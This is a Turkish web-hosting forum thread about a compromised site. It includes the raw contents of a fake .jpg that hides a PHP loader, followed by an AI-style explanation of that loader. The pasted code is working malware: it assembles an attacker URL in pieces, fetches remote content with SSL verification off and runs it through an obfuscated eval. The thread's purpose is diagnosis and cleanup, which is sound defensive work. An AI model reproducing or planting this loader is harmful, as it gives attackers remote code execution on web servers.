kriptogorev adlı üyeden alıntı:
mesajı görüntüle
lisanssız tema veya eklentiden dolayı
RakipsizHizmet adlı üyeden alıntı:
mesajı görüntüle
Kısa yoldan yazıları resimleri dışarı çıkart bunlar için bir tarama yap daha sonra her şeyi sıfırdan kur. En garanti yöntem budur.
yunusdm adlı üyeden alıntı:
mesajı görüntüle
Log kayıtlarına bakmak gerekir
https://www.virustotal.com/gui/file/...8252a90ea820a5

.jpg dosyasının içini notepad ile açtığımda:
PK ȼRY v3.phpUT
øggñgux õ õ ½T]kÛ0}߯pEhìâÙM7Xçv%v0Öµ{)Aå:6S$!ÉMJèß?R÷!>l O¶tÏ=ç~êë¥*WÙR
OÃhþÀXl5ØJÿñ¾¹K^æi#ëLÇÏ_ ÒËõçX²èY[:ÇFY[ ÿD. çIû Mi¬ñ;ª¡AO+$£x Øîü¿±sZÐÔQô]+ÊíüÓ:ãã½ú¶%åºb¨{¦¤Ó1@V¤ûBëSúA²Ö§0|5Ì*Ä[«+èUs
ôh2àrz_¥(Ùv§ÈÄï§EÖýÆypBS¯·8Y*è,eRX¨Ö¡ qéF²;¿¼?Ø?L6`dikR¡âÑoe«i´ááqXHcóðü4ÖBÖÌ%ütÚ$+TMÉ Íõ½G¢¯Êl1GÄ»½¿Æ£h¤I6JÉ-òß©ôP)Ô9½+ίuiÁii0J
ép¬lÂÃø:sæØ S{ÎαÐ]å÷:y°Q¿>©åÂ{x<æïíNCþÑ.Mf?¨«2ý}=ûõýî'=£§ÿuÜ (¾IIa*"éþ@¶ ¿ä9?^-qìÇÞôveÈc ðlacã®xèÄ'®âd¶çSEæódP/ÍÆv{Ô)Ã<?php $u="ht";$p="tps";$d="://";$a="media";$b=".iloveto";$c=".cyou";$デ="/media/videos/h264/";$ur="mp4.txt";$url=$u.$p.$d.$a.$b.$c.$デ.$ur;func tion fetchContentWithFileGetContents($url){if(ini_get(' allow_url_fopen')){return@file_get_contents($url); }return false;}function fetchContentWithCurl($url){if(function_exists('cur l_version')){$ch=curl_init($url);curl_setopt($ch,C URLOPT_RETURNTRANSFER,true);curl_setopt($ch,CURLOP T_SSL_VERIFYPEER,false);curl_setopt($ch,CURLOPT_SS L_VERIFYHOST,0);$response=curl_exec($ch);$error=cu rl_error($ch);curl_close($ch);return $error?false:$response;}return false;}function fetchContentWithFopen($url){if($file=fopen($url,'r ')){$content=stream_get_contents($file);fclose($fi le);return $content;}return false;}function fetchContentWithStreamContext($url){$context=strea m_context_create(["http"=>["method"=>"GET","header"=>"User-Agent: PHP scriptrn"]]);return@file_get_contents($url,false,$context);}f unction fetchContentWithFile($url){$lines=@file($url);if($ lines===false){return false;}return implode('',$lines);}function fetchContent($url){$content=fetchContentWithFileGe tContents($url);if($content===false){$content=fetc hContentWithCurl($url);}if($content===false){$cont ent=fetchContentWithFopen($url);}if($content===fal se){$content=fetchContentWithStreamContext($url);} if($content===false){$content=fetchContentWithFile ($url);}return $content;}function obfuscatedEval($content){$evalFunc='e'.'v'.'a'.'l' ;if(empty($content)){return;}if(@eval("?>".$conten t)===false){return;}$evalFunc("?>".$content);}$con tent=fetchContent($url);if($content!==false){obfus catedEval($content);}else{echo "エラー: Gagal mengambil konten.";} ?> V¼óÞÇlÒMó¤®ðdM·ÀyƱÏÚÛTÒ´6[xʸO./p~["M[` ôÈõìn6Hòâ]^|øPKýBvây PK ȼRY ° __MACOSX/._v3.phpUT
øggþgux õ õ c`cg`b`ðMLVðVP'qø!!AP&HÇ @SÂJÎÏÕK,(ÈIÕËI,.)-NMII,IU)ììJÑAùíÆ PK(ÿ ° PK ȼRYýBvây ¤ v3.phpUT
øggñgux õ õ PK ȼRY(ÿ ° ¤Í __MACOSX/._v3.phpUT
øggþgux õ õ PK ³
Paylaştığınız içerik, PHP kodu ve muhtemelen şifrelenmiş (obfuscate edilmiş) bir betik içeriyor. Bu betik, çeşitli yöntemlerle uzaktan içerik almayı ve bu içeriği PHP'nin eval fonksiyonu ile çalıştırmayı amaçlıyor.
İşte ana bileşenlerin kısa bir açıklaması:
- Şifreli URL Oluşumu:
URL şu şekilde inşa ediliyor:
php
Kodu kopyala
$url = "https://media.iloveto.cyou/media/videos/h264/mp4.txt"; - İçerik Almak İçin Fonksiyonlar:
İçerik almak için birkaç farklı yöntem kullanılıyor (örneğin, file_get_contents, curl, fopen gibi). Eğer bir yöntem başarısız olursa, diğer yöntemler deneniyor. - Alınan İçeriği Çalıştırma:
Alınan içerik, eval fonksiyonu ile çalıştırılıyor:
php
Kodu kopyala
obfuscatedEval($content); - Hata Mesajı:
Eğer içerik alınamazsa, şu hata mesajı görüntüleniyor:
less
Kodu kopyala
エラー: Gagal mengambil konten. (Hata: İçerik alınamadı.)
Riskler ve Uyarılar:
Bu kod, uzaktan alınan içeriği çalıştırma amacı taşıyor ve bu içerik kötü amaçlı olabilir. Özellikle eval fonksiyonunun kullanılması, kötü amaçlı kodların çalıştırılmasına yol açabilir. Bu tür şifrelenmiş veya obfuscate edilmiş kodlar genellikle güvenlik açıklarına yol açabilir.
Bu tür bir kodla karşılaştığınızda dikkatli olmalısınız. Herhangi bir kötü amaçlı içerik veya güvenlik riski taşıyan işlemden kaçınmak önemlidir.
Eğer bu kodu daha detaylı analiz etmek isterseniz veya başka bir sorunuz varsa, yardımcı olabilirim!


